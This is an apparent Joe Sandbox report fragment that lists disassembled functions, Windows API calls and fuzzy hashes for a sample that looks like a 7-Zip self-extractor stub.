                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@ItemMessageSendwsprintf
                                                            • String ID: %d%%
                                                            • API String ID: 3767627759-1518462796
                                                            • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                            • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                            • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                            • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                            Function 0040E811 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                            • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                            • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                            • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@ExceptionThrowmemcpy
                                                            • String ID: IA
                                                            • API String ID: 3462485524-3293647318
                                                            • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                            • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                            • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                            • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                            Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: wsprintf$ExitProcesslstrcat
                                                            • String ID: 0x%p
                                                            • API String ID: 2530384128-1745605757
                                                            • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                            • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                            • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                            • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                            Function 00407A3A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                              • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                            • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                            • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                            • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$??3@
                                                            • String ID: 100%%
                                                            • API String ID: 2562992111-568723177
                                                            • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                            • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                            • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                            • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                            Function 00407998 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfW.USER32 ref: 00407A12
                                                              • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                              • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                            • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                              • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                              • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: TextWindow$ItemLength$??3@wsprintf
                                                            • String ID: (%u%s)
                                                            • API String ID: 3595513934-2496177969
                                                            • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                            • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                            • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                            • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                            Function 004021ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32
                                                            • API String ID: 2574300362-3846845290
                                                            • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                            • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                            • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                            • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                            Function 00402185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                            • API String ID: 2574300362-3900151262
                                                            • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                            • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                            • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                            • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                            Function 004021B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                            • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                            • API String ID: 2574300362-736604160
                                                            • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                            • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                            • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                            • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                            Function 00402A69 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                              • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 1731127917-0
                                                            • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                            • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                            • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                            • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                            Function 00403F85 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                            • wsprintfW.USER32 ref: 00403FFB
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: PathTemp$AttributesFilewsprintf
                                                            • String ID:
                                                            • API String ID: 1746483863-0
                                                            • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                            • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                            • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                            • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                            Function 00401A85 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperW.USER32(?,7727E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                            • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                            • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                            • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: CharUpper
                                                            • String ID:
                                                            • API String ID: 9403516-0
                                                            • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                            • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                            • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                            • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                            Function 00407FA5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                              • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                              • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                            • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                            • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                              • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                              • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                              • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                              • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                            • String ID:
                                                            • API String ID: 2538916108-0
                                                            • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                            • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                            • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                            • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                            Function 004067ED Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                            • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                            • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                            • DeleteObject.GDI32(00000000), ref: 00406878
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                            • String ID:
                                                            • API String ID: 1900162674-0
                                                            • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                            • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                            • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                            • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                            Function 0040748A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040749F
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                            • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                            • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                              • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                              • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                            • String ID:
                                                            • API String ID: 1557639607-0
                                                            • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                            • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                            • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                            • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                            Function 004027C7 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                              • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                              • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                            • String ID:
                                                            • API String ID: 612612615-0
                                                            • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                            • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                            • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                            • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                            Function 00403AB1 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                              • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                            • SetWindowTextW.USER32(?,?), ref: 00403B12
